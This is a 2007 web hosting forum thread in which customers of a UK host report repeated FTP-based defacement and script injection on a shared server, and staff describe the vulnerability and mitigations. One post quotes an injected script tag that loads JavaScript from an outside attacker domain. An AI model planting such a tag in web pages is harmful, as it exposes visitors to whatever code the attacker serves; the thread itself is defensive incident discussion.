UK WEB HOSTING FORUM FOR DISCUSSION ON WEB HOSTING SERVICE AND SUPPORT
LINUX HOSTING WINDOWS HOSTING PACKAGES SHOPPING CART OSCOMMERCE ZEN CART AGORA
ECOMMERCE HOSTING ASP MSSQL FRONTPAGE HOSTING PHP MYSQL HOSTING DISCUSSION FORUM
CPANEL RESELLER HOSTING DEDICATED SERVER VPS HOSTING PLESK VIRTUOZZO
Quick Search
Your forum announcement here!

  UK Web Hosting | Dedicated Server Windows and Linux VPS Forum > Technical Support > cPanel Reseller Hosting

Reply
 
LinkBack Thread Tools Search this Thread Display Modes
  #21 (permalink)  
Old 23-04-2007, 19:47
eUKhost.com's Avatar
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,405
Send a message via AIM to eUKhost.com Send a message via MSN to eUKhost.com
Default

Hello Brian,

Have you faced any problems in last 24 hours ?

I am mainly looking for FTP problems and injections so let me know if you had any problems in last 24 hours.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
for FREE and earn 20% commission on each referral.
Reply With Quote
  #22 (permalink)  
Old 23-04-2007, 20:10
Brian's Avatar
Premium Member
 
Join Date: Nov 2005
Location: New Mexico
Posts: 669
Default

Just around 24hrs ago I noticed a problem but just reuploaded my website hosting. Nothing has happened since. Good luck with stoping all this BS!
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
Reply With Quote
  #23 (permalink)  
Old 24-04-2007, 07:21
DavidAllen's Avatar
Premium Member
 
Join Date: Jan 2007
Location: Amersham
Posts: 343
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Angry It's happened again

Index.html changed again - at 23:12 last night (server time is 1 hr behind so thats 00:12 this am) Whole load of pharmacy links to www.math.uchicago.edu/

So much for new secure server

Regards
David
Reply With Quote
  #24 (permalink)  
Old 24-04-2007, 07:40
Premium Member
 
Join Date: May 2006
Location: Cambridgeshire
Posts: 410
Default

It would be worth running an antivirus scan on your computer to ensure that there isn't any keylogging software installed which could allow hackers to discover your login/FTP details. Also it would be worth checking the website hosting affected for any files which could be used by hackers to gain entry to the website hosting. If other website hostings aren't affected then I'm inclined to think that the hackers have found away into your website hosting rather than the server.
Reply With Quote
  #25 (permalink)  
Old 24-04-2007, 07:56
DavidAllen's Avatar
Premium Member
 
Join Date: Jan 2007
Location: Amersham
Posts: 343
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Default I don't think so

I don't think it's just my website hosting - i just checked some other website hostings on Jaguar (not mine) an they have similar added code
David

Ps could anyone else on Jaguar confirm this?
Reply With Quote
  #26 (permalink)  
Old 24-04-2007, 17:45
Junior Member
 
Join Date: Apr 2007
Posts: 15
Default

Something someone suggested to me was to change permissions on the affected files to 444 from 644. I certainly haven't received an attack since doing this (although, this does coincide with being moved servers).
Reply With Quote
  #27 (permalink)  
Old 24-04-2007, 17:47
Junior Member
 
Join Date: Apr 2007
Posts: 15
Default

Quote:
Originally Posted by Eidolon View Post
It would be worth running an antivirus scan on your computer to ensure that there isn't any keylogging software installed which could allow hackers to discover your login/FTP details. Also it would be worth checking the website hosting affected for any files which could be used by hackers to gain entry to the website hosting. If other website hostings aren't affected then I'm inclined to think that the hackers have found away into your website hosting rather than the server.
The only problem with this is that I was receiving identical injections. I even changed all my FTP logins that could have been responsible and it happened again. Hence I'm inclined to think its a server issue.

My dad (also a webmaster) had a similar problem on a different host a couple of years back. It was always his index.php/html that got targetted. Thus I think its a script targetting index/other crucial files.

He eventually countered the problem using 444 permissions, but this doesn't render the server any more secure unforunately.
Reply With Quote
  #28 (permalink)  
Old 24-04-2007, 20:38
eUKhost.com's Avatar
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,405
Send a message via AIM to eUKhost.com Send a message via MSN to eUKhost.com
Default

it was kernel exploit when your dad experienced this problem but this time its an FTP exploit. This exploit has been discovered recently and thats the reason it is taking some time to get a permanent solution for it but make sure that you don't leave anything with 777 permission as of now as 777 permission as an open invitation for injections.

If you see anything suspicious then let me know that in detail as I would like to investigate how this has been possible. OS, software version and kernel version is new so serverwide injection is not possible as of now.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
for FREE and earn 20% commission on each referral.
Reply With Quote
  #29 (permalink)  
Old 24-04-2007, 20:54
DavidAllen's Avatar
Premium Member
 
Join Date: Jan 2007
Location: Amersham
Posts: 343
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Default

I supplied details at 08:25 this morning on ticket #ENS-95952-191 - no reponse as yet!
Do you want more details?
Reply With Quote
  #30 (permalink)  
Old 24-04-2007, 21:14
eUKhost.com's Avatar
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,405
Send a message via AIM to eUKhost.com Send a message via MSN to eUKhost.com
Default

your ticket was moved in ownership of Nick ( our CTO ) and he will need some time to trace how exactly those were injected.


If you need a reply then i will ask someone to reply but it wont help until the investigation work of Nick gets completed.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
for FREE and earn 20% commission on each referral.
Reply With Quote
  #31 (permalink)  
Old 24-04-2007, 22:40
DavidAllen's Avatar
Premium Member
 
Join Date: Jan 2007
Location: Amersham
Posts: 343
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Default

Don't need a reply - nice to know something is being done though.
Thanks
Reply With Quote
  #32 (permalink)  
Old 25-04-2007, 07:59
Junior Member
 
Join Date: Nov 2006
Posts: 24
Default

Quote:
Originally Posted by Rock View Post
Deep,
Such incidents are most of the time rumours/hoaxes, nothing to worry about them.
Our servers are well equipped to fight against such hack attempts & to keep them at bay. We have various tools (firewalls) running on our servers to monitor such events. None of our servers have been yet hacked, but unfortunately (as hairyfreak said) few website hostings are hacked due to insecure permissions set on files by their owners/webadmins.
If you received any such email from the hackers, please have it forwarded to our support dept.
Oh, what's going on here

Thank you , I don't know what happened to jaguar server or any defaces, on our website hostings we have more than 40000 users, emails and personal information , defacing the first page is just something like static hacking ,fortunately till now we did'nt have any deface, I worry about database and personal information of users, you know if they can access the files so its easy to read sources and extract db password, oh I can't even think about that,

I hope nothing happen in future,
Thanks
Reply With Quote
  #33 (permalink)  
Old 25-04-2007, 08:04
DavidAllen's Avatar
Premium Member
 
Join Date: Jan 2007
Location: Amersham
Posts: 343
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Default Latest on the Hacks on Jaguar

Received this reply from Nick about the latest attacks on Jaguar
Quote:
Hello David,

I apologize for replying late.

Yes it was done using the same method of BFD and password crack.

Pure-FTPd is a fast, production-quality and standards-compliant FTP server.
Pure-FTPd contains a bug in the accept_client function handling the setup of new connections. When the maximum number of connections is reached an attacker could exploit this vulnerability to perform a Denial of Service attack or Brute Force Attack. There is no known workaround at this time.
The only solution is to upgrade the pure-ftpd version to latest stable version pure-ftpd v1.0.21 which is already done.

Also, we have installed the BFD on sever and reduced the number connection per IP address per sec. This will block the IP if there are more than 4 connections per IP per sec.

I am still investigating it and would update you if there any configuration changes made on server.

Regards,
NickJ
Senior Admin
Support Team.
So I guess the attacks may well continue - and all we can do is check website hostings every day and perhaps change passwords every day. As I have well over 60 website hostings on this server that is a lot of checking and cleaning to do every day - my business is starting to suffer due to all this extremely time consuming extra work!
David

Ps What is BFD (i thought it was Brute Force something - but as Nick says its installed on the server I guess not)
Reply With Quote
  #34 (permalink)  
Old 25-04-2007, 09:09
Premium Member
 
Join Date: May 2006
Location: Cambridgeshire
Posts: 410
Default

BFD - Brute Force Detection
Reply With Quote
  #35 (permalink)  
Old 25-04-2007, 11:59
eUKhost.com's Avatar
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,405
Send a message via AIM to eUKhost.com Send a message via MSN to eUKhost.com
Default

Quote:
Originally Posted by deep View Post
Oh, what's going on here

Thank you , I don't know what happened to jaguar server or any defaces, on our website hostings we have more than 40000 users, emails and personal information , defacing the first page is just something like static hacking ,fortunately till now we did'nt have any deface, I worry about database and personal information of users, you know if they can access the files so its easy to read sources and extract db password, oh I can't even think about that,

I hope nothing happen in future,
Thanks
I can understand questions which have got raised in your mind due to this problem but let me clarify that the database is safe and will remain so. FTP users can never access database and it is next to impossible to inject or read entries in MySQL Server databases without authentication of the database owner.

you don't need to be so concerned about privacy of your data as we are here to protect your private data. I do agree that public content was affected due to this problem but none of your private data was tampered.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
for FREE and earn 20% commission on each referral.
Reply With Quote
  #36 (permalink)  
Old 25-04-2007, 12:28
DavidAllen's Avatar
Premium Member
 
Join Date: Jan 2007
Location: Amersham
Posts: 343
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Default What should happen next

As responsible hosts should you be sending an email to all admin contacts for domains on that sever to:
a) Tell them about the problem
b) Ask them to clean their sites
c) Suggest they change password
d) Check regularly for new attacks
e) Check that no ftp accounts have been added
f) Reassure them about data integrity

Whilst some of the stuff is essentially harmless (broken links to script files) it might not always be. The rest of the stuff is not harmless to have on your website hosting - it can lead, as we have seen, to being blacklisted by Google, harming your companies reputation (search for my company on Google in russian and you get thousands of porn results!! - lucky i'm not planning on expanding to Russia ). So cleaning website hostings is essential.

David
Reply With Quote
  #37 (permalink)  
Old 25-04-2007, 12:36
eUKhost.com's Avatar
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,405
Send a message via AIM to eUKhost.com Send a message via MSN to eUKhost.com
Default

Injection occurred on less than 30 website hostings on the server so its not feasible to bother all customers. As a responsible host its our responsibility to create no inconvenience for customers so every 24 - 48 hours we run script that checks iframe injection and we manually replace if something new was found.

As of now the volume has reduced and seems like the team putting its efforts on our server is loosing its patience now as all their IPs have got blocked on the server.

some of our customers know how we take care of our jobs as our support team emails them and phone support staff calls all customers on respective server when something happens on serverside resulting in problems for all customers on that particular server.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
for FREE and earn 20% commission on each referral.
Reply With Quote
  #38 (permalink)  
Old 25-04-2007, 13:14
DavidAllen's Avatar
Premium Member
 
Join Date: Jan 2007
Location: Amersham
Posts: 343
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Default Hmm

Well the script injection looks like to have occurred on a lot more than 30 website hostings. I know that the script file it points to doesn't appear to be there at the moment - but there is nothing to stop them adding it to the server at gomyron.com - and then anything could be being served up to peoples browsers.
And there are still some iframe tags out there live still
David
Reply With Quote
  #39 (permalink)  
Old 25-04-2007, 21:05
eUKhost.com's Avatar
Chief Marketing Officer
 
Join Date: Sep 2005
Posts: 4,405
Send a message via AIM to eUKhost.com Send a message via MSN to eUKhost.com
Default

I've personally ran some commands to see how many website hostings had iframe injection and it was surely below 30. I never took any screenshot to prove my words.

please explain whats wrong with gomyron.com as this domain seems to be hosted somewhere else.
__________________

To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
||
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

Toll Free : 0808 262 0255 || MSN : mark @ eukhost.com || AIM : eukmark
A bunch of Sheep led by a Lion is better than a bunch of Lions led by a Sheep.
__________________________________________________

Great Opportunity :: Join our
To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.
for FREE and earn 20% commission on each referral.
Reply With Quote
  #40 (permalink)  
Old 25-04-2007, 23:07
DavidAllen's Avatar
Premium Member
 
Join Date: Jan 2007
Location: Amersham
Posts: 343
Send a message via MSN to DavidAllen Send a message via Skype™ to DavidAllen
Default That's the source for script

The following lines have been added to quite a few sites


script type="text/javascript" language="JavaScript" src="http://jsp.gomyron.com/functions.js.php?type=popexit&link=http://gomyron.com/MTU1NTI=/2/4811//"></script>

Which like i say could do anything - id doesn't cos script doesn't appear to be there at the moment - but the bad guys could put it there - to do whatever they want.

I'm sure I've seen that on more than 30 sites

Last edited by DavidAllen; 25-04-2007 at 23:10.
Reply With Quote
Reply



Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


All times are GMT. The time now is 13:27.

 

Powered by vBulletin® Version 3.7.2
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
LinkBacks Enabled by Web Hosting 3.1.0
Copyright © 2001-2008, eUKhost.com. All rights reserved.

 
Site Map

VPS Hosting
VPS Hosting plans

Dedicated Server Hosting
Dedicated Server plans

Business Web Hosting
100% uptime Hosting

Cpanel Hosting
cPanel Shared Hosting

Reseller Hosting
Reseller Web Hosting

Windows Hosting
Windows Shared Hosting

Windows VPS

Windows VPS Hosting

Semi Dedicated Servers
Semi-Dedicated Hosting

Dedicated Server Mirroring
Dedicated Server Mirroring

Webhosting Knowledgebase
Frequently asked Questions

Web Hosting Blog
eUKhost Blog

Web